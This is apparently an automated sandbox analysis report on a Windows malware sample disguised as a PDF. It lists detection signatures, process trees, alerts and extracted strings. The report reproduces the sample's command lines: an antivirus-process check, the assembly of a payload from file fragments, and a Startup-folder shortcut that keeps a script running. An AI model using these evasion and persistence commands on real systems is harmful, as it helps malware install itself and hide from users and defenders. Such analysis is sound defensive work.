Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
scan_doc_zapit_836893.pdf.exe

Overview

General Information

Sample name:scan_doc_zapit_836893.pdf.exe
Analysis ID:1546130
MD5:cbcb0ff5aa471e22a6b129196a556d97
SHA1:b3dca2cac1624e6a8b318708c02376c1eb6ab784
SHA256:5c1ce789a60371e388881ffbe0311bd2829e5e8dbaf77506929e50638f22d866
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious Double Extension File Execution
AI detected suspicious sample
Deletes itself after installation
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • scan_doc_zapit_836893.pdf.exe (PID: 432 cmdline: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe" MD5: CBCB0FF5AA471E22A6B129196A556D97)
    • cmd.exe (PID: 1976 cmdline: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1136 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3352 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1968 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2876 cmdline: cmd /c md 185027 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1816 cmdline: findstr /V "venezuelalandscapesmeantposters" Tournaments MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2748 cmdline: cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spy.pif (PID: 6808 cmdline: Spy.pif H MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 2940 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5344 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 6556 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • NanoCipher.scr (PID: 6536 cmdline: "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe", CommandLine: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe, NewProcessName: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe, OriginalFileName: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe", ProcessId: 432, ProcessName: scan_doc_zapit_836893.pdf.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , ProcessId: 6556, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Spy.pif H, CommandLine: Spy.pif H, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1976, ParentProcessName: cmd.exe, ProcessCommandLine: Spy.pif H, ProcessId: 6808, ProcessName: Spy.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe", ParentImage: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe, ParentProcessId: 432, ParentProcessName: scan_doc_zapit_836893.pdf.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ProcessId: 1976, ProcessName: cmd.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" , ProcessId: 6556, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2940, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1976, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 1968, ProcessName: findstr.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T14:37:56.122278+010020229301A Network Trojan was detected4.245.163.56443192.168.2.649744TCP
2024-10-31T14:38:36.677956+010020229301A Network Trojan was detected4.245.163.56443192.168.2.649920TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.3% probability
Source: scan_doc_zapit_836893.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: scan_doc_zapit_836893.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076CD14 FindFirstFileW,FindClose,17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00763CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\185027\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\185027Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49744
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49920
Source: unknownDNS traffic detected: query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00AF29BA
Source: global trafficDNS traffic detected: DNS query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://ocsp.digicert.com0
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, NanoCipher.scr, 00000011.00000000.2289726663.00000000007C9000.00000002.00000001.01000000.00000008.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: scan_doc_zapit_836893.pdf.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: NanoCipher.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00AF4830
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_00774830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00774830
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00AF4632
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifCode function: 11_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00B0D164
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scrCode function: 17_2_0078D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_0078D164

System Summary

barindex
Source: initial sampleStatic PE information: Filename: scan_doc_zapit_836893.pdf.exe
